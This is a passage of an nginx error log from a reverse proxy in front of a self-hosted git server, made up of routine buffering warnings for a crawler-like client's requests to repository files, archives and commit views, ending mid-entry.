request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:26 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/57/0000004577 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/57/0000004578 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/ebd2be03a23e76e126207d40a257d72f40ab9a7c.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/57/0000004579 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/58/0000004580 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:28 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/58/0000004581 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:29 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/58/0000004582 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:29 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/58/0000004583 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:30 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/58/0000004584 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:30 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/58/0000004585 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:33 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/58/0000004586 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:34 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/58/0000004587 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:35 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/58/0000004588 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/7e5f452449b5385fa46a3a589ed6aac00a02734a.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:35 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/58/0000004589 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:36 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/59/0000004590 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.zip", host: "git.hanmocnn.co.kr" -2026/02/15 09:34:36 [warn] 820#820: *14506 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/59/0000004591 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 10:13:27 [warn] 821#821: *14725 a client request body is buffered to a temporary file /tmp/nginx/body/7/59/0000004597, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr" -2026/02/15 10:51:39 [warn] 822#822: *14990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/60/0000004601 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 10:51:57 [warn] 823#823: *15107 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/60/0000004602 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 10:51:57 [warn] 823#823: *15107 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/60/0000004603 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets", host: "git.hanmocnn.co.kr" -2026/02/15 10:51:57 [warn] 823#823: *15107 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/60/0000004604 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 10:54:10 [warn] 817#817: *15781 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/60/0000004605 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.3", host: "git.hanmocnn.co.kr" -2026/02/15 10:54:40 [warn] 819#819: *15986 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/60/0000004606 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/60/0000004607 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/60/0000004608 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/60/0000004609 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/61/0000004610 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/61/0000004611 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 10:55:28 [warn] 819#819: *16192 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/61/0000004612 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fservices%2FgeminiService.ts HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fservices%2FgeminiService.ts", host: "git.hanmocnn.co.kr" -2026/02/15 10:56:53 [warn] 820#820: *16380 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/61/0000004613 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 10:56:53 [warn] 820#820: *16380 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/61/0000004614 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.dgspec.json HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.dgspec.json", host: "git.hanmocnn.co.kr" -2026/02/15 10:57:33 [warn] 821#821: *16414 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/61/0000004615 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 12:12:32 [warn] 832#832: *17501 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/61/0000004616 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/adf9a81cb0ea52c9fa32f352b5800e021665bb47.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/adf9a81cb0ea52c9fa32f352b5800e021665bb47.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 12:14:36 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/61/0000004617 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 12:14:37 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/61/0000004618 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Ftemplates%2Ffavicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Ftemplates%2Ffavicon.ico", host: "git.hanmocnn.co.kr" -2026/02/15 12:14:37 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/61/0000004619 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages", host: "git.hanmocnn.co.kr" -2026/02/15 12:14:37 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/62/0000004620 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin", host: "git.hanmocnn.co.kr" -2026/02/15 12:14:57 [warn] 833#833: *17962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/62/0000004621 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 12:14:57 [warn] 833#833: *17962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/62/0000004622 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 12:14:58 [warn] 833#833: *17962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/62/0000004623 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages", host: "git.hanmocnn.co.kr" -2026/02/15 12:15:23 [warn] 834#834: *18020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/62/0000004624 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 12:15:23 [warn] 834#834: *18020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/62/0000004625 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 12:15:24 [warn] 834#834: *18020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/62/0000004626 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 12:16:15 [warn] 831#831: *18187 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/62/0000004627 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 12:16:30 [warn] 831#831: *18241 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/62/0000004628 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3", host: "git.hanmocnn.co.kr" -2026/02/15 12:16:40 [warn] 831#831: *18293 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/62/0000004629 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx", host: "git.hanmocnn.co.kr" -2026/02/15 12:21:41 [warn] 832#832: *18692 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/63/0000004630 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 12:21:46 [warn] 832#832: *18694 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/63/0000004631 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 13:16:44 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/63/0000004632 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch", host: "git.hanmocnn.co.kr" -2026/02/15 13:16:44 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/63/0000004633 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx", host: "git.hanmocnn.co.kr" -2026/02/15 13:16:45 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/63/0000004634 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.diff", host: "git.hanmocnn.co.kr" -2026/02/15 13:16:45 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/63/0000004635 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts", host: "git.hanmocnn.co.kr" -2026/02/15 13:16:55 [warn] 833#833: *18817 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/63/0000004636 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite", host: "git.hanmocnn.co.kr" -2026/02/15 13:18:49 [warn] 831#831: *19161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/63/0000004637 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:19:23 [warn] 831#831: *19216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/63/0000004638 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:19:39 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/63/0000004639 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/64/0000004640 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/64/0000004641 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/64/0000004642 while reading upstream, client: 